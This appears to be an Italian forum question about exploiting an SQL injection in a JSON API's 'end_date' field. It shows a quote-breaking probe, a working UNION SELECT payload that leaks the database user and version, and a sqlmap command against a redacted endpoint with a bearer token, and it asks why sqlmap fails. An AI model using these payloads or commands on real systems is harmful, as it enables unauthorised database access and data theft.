Questo è un dato post, normalmente appare come questo
{"end_date":"2018-8-26","start_date":"2018-8-26","success":1}
Di seguito risultante "Hai un errore ..."
{"end_date":"2018-8-26'","start_date":"2018-8-26","success":1}
Qui sotto correttamente stampa la versione db e la versione utente
{"end_date":"00:00:00') union select 1,user(),version();--+","start_date":"","success":1}
Quello che ho fatto finora è
python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00","start_date":"2018-8-26","success":1}' -p "end_date" --sql-query="00:00:00') union select 1,user(),version();--+" -v 3
Ma Sqlmap ha fallito ancora, dove sto sbagliando?
Grazie in anticipo.